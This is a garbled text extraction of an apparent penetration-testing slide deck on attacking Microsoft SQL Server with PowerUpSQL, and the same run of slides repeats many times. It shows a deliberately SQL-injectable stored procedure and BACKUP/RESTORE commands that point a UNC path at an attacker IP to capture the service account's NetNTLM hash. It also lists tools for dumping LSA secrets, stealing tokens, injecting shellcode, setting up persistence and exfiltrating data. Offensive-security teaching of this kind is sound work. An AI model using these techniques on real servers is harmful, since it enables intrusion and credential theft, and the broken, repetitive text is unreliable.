Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation Overview
Common Post Exploitation Activities
1. Establish Persistence
• SQL Server Layer: startup procedures, agent jobs, triggers, modified code
• OS Layer: registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
• Target large databases
• Locate transparently encrypted databases
• Search columns based on keywords and sample data
• Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
• All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
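The "regular expressions and the Luhn formula" check from item 2, as an added example that is not PowerUpSQL code: it scans constructed sample rows (invented data; the card numbers are the public test numbers) and shows why the checksum matters for a data-discovery or DLP rule, since a 16-digit order reference passes the regex but fails Luhn.

```powershell
# Added example (not PowerUpSQL code): regex plus Luhn over constructed sample rows.
# Regex alone over-matches long digit runs; the Luhn mod-10 check filters that
# noise so a classification report only flags plausible card numbers.

function Test-Luhn {
    param([Parameter(Mandatory)][string]$Digits)
    # From the right: double every second digit, subtract 9 if the result
    # exceeds 9, sum everything; valid when the total is a multiple of 10.
    $sum = 0
    $double = $false
    for ($i = $Digits.Length - 1; $i -ge 0; $i--) {
        $d = [int]::Parse([string]$Digits[$i])
        if ($double) {
            $d *= 2
            if ($d -gt 9) { $d -= 9 }
        }
        $sum += $d
        $double = -not $double
    }
    return (($sum % 10) -eq 0)
}

function Find-CardNumberCandidates {
    param([Parameter(Mandatory)][object[]]$Rows)
    # 13-19 digits, optionally separated by single spaces or dashes. The
    # lookarounds stop a longer digit string from being split into a match.
    $pattern = '(?<![\d])(?:\d[ -]?){12,18}\d(?![\d])'
    foreach ($row in $Rows) {
        foreach ($column in $row.PSObject.Properties) {
            $value = [string]$column.Value
            foreach ($m in [regex]::Matches($value, $pattern)) {
                $digits = $m.Value -replace '[ -]', ''
                [pscustomobject]@{
                    RowId     = $row.Id
                    Column    = $column.Name
                    Sample    = $m.Value
                    LuhnValid = Test-Luhn -Digits $digits
                }
            }
        }
    }
}

# Constructed sample rows: two real-looking card numbers (public test numbers)
# and two order references that are only digits.
$sampleRows = @(
    [pscustomobject]@{ Id = 1; Notes = 'card 4111 1111 1111 1111 on file';  OrderRef = '20170116123456789' }
    [pscustomobject]@{ Id = 2; Notes = 'cust called about 5500000000000004'; OrderRef = '1234567890123456' }
    [pscustomobject]@{ Id = 3; Notes = 'no payment data here';              OrderRef = 'ORD-42' }
)

$hits = @(Find-CardNumberCandidates -Rows $sampleRows)
$hits | Format-Table -AutoSize
# Four regex matches, but only the two Notes values survive the Luhn check.
"Regex matches: {0}, Luhn-valid: {1}" -f $hits.Count, @($hits | Where-Object { $_.LuhnValid }).Count
```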
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server you have it on all of them
One account to rule them all
[Figure: Leveraging Shared MS SQL Server Service Accounts. Network diagram with Internet, DMZ and Intranet zones; LVA and HVA database servers, ADS, ports 80 and 443, ports 1433 and 1434; attacker "Captain Evil". Steps: 1. SQL Injection; 2. Execute local command via xp_cmdshell; 3. Access to HVA with shared domain service account, execute commands and gather data from other database servers via osql. Key: HVA = High Value Application, LVA = Low Value Application]
Escalating Privileges
Crawling SQL Server Links
Escalating Privileges: Crawling SQL Server Links
What's a SQL Server link?
SQL Server links are basically persistent database connections for SQL Servers
Why should I care?
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT * FROM OpenQuery([SQLSERVER2], 'SELECT @@Version')
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
[Figure: Leveraging MS SQL Database links. Network diagram with Internet, DMZ and Intranet zones; LVA and HVA database servers, ADS, ports 80 and 443, ports 1433 and 1434; attacker "Captain Evil"; DB1 (LVA) reached over a DB link with least privileges, followed by a DB link with the SA account. Steps: 1. SQL Injection; 2. Execute SQL queries and local commands on database servers via nested linked services. Key: HVA = High Value Application, LVA = Low Value Application]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50% of environments we've seen
The max number of hops we've seen is 12
The max number of servers crawled is 226
Escalating Privileges: Crawling Server Links
Old Script
Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql
Escalating Privileges: Crawling Server Links
Function | Description
Get-SQLServerLink | Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl | Crawls linked servers and supports SQL query and OS command execution
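The crawl that Get-SQLServerLinkCrawl performs, shown as an added example rather than PowerUpSQL's own code: a breadth-first walk over a constructed map of linked servers ($LinkMap, with invented server names and link logins) that reports every reachable server, its hop count and path, and which hops arrive through a link configured with the sa login, which is what an audit of link exposure needs to surface.

```powershell
# Added example (not PowerUpSQL code): measure link exposure on a constructed
# map of SQL Server links. $LinkMap is invented sample data: for each server,
# its linked servers and the remote login each link authenticates with
# ('' means the link runs in the caller's security context, i.e. impersonation).
$LinkMap = @{
    'SQLSERVER1' = @(
        @{ Name = 'SQLSERVER2'; RemoteLogin = '' }
        @{ Name = 'REPORTS01';  RemoteLogin = 'report_reader' }
    )
    'SQLSERVER2' = @(
        @{ Name = 'HVA-DB1';    RemoteLogin = 'sa' }   # link configured with sa
        @{ Name = 'SQLSERVER1'; RemoteLogin = '' }     # loop back to the start
    )
    'HVA-DB1'    = @(
        @{ Name = 'HVA-DB2';    RemoteLogin = 'sa' }
    )
    'HVA-DB2'    = @()
    'REPORTS01'  = @()
}

function Invoke-LinkMapCrawl {
    param(
        [Parameter(Mandatory)][hashtable]$LinkMap,
        [Parameter(Mandatory)][string]$Start,
        [int]$MaxHops = 12
    )
    # Breadth-first search: every server is recorded at its shortest hop count,
    # and the visited set stops loops such as SQLSERVER2 -> SQLSERVER1.
    $visited = @{}
    $visited[$Start] = 0
    $queue = New-Object System.Collections.Queue
    $queue.Enqueue(@{ Server = $Start; Path = @($Start); Hops = 0; Login = '<start>' })
    $results = @()
    while ($queue.Count -gt 0) {
        $current = $queue.Dequeue()
        $results += [pscustomobject]@{
            Server      = $current.Server
            Hops        = $current.Hops
            Path        = ($current.Path -join ' -> ')
            RemoteLogin = $current.Login
            HighRisk    = ($current.Login -eq 'sa')   # arrived as sa on this server
        }
        if ($current.Hops -ge $MaxHops) { continue }
        foreach ($link in $LinkMap[$current.Server]) {
            if ($visited.ContainsKey($link.Name)) { continue }
            $visited[$link.Name] = $current.Hops + 1
            $queue.Enqueue(@{
                Server = $link.Name
                Path   = $current.Path + $link.Name
                Hops   = $current.Hops + 1
                Login  = $(if ($link.RemoteLogin) { $link.RemoteLogin } else { 'impersonation' })
            })
        }
    }
    $results
}

$crawl = @(Invoke-LinkMapCrawl -LinkMap $LinkMap -Start 'SQLSERVER1')
$crawl | Format-Table -AutoSize
# On the sample map: 5 servers reachable, 3 hops deep, HVA-DB1 and HVA-DB2 reached as sa.
"Servers reachable: {0}; max hops: {1}" -f $crawl.Count, ($crawl | Measure-Object -Property Hops -Maximum).Maximum
"Servers reached as sa: {0}" -f (($crawl | Where-Object { $_.HighRisk } | ForEach-Object { $_.Server }) -join ', ')
```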
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
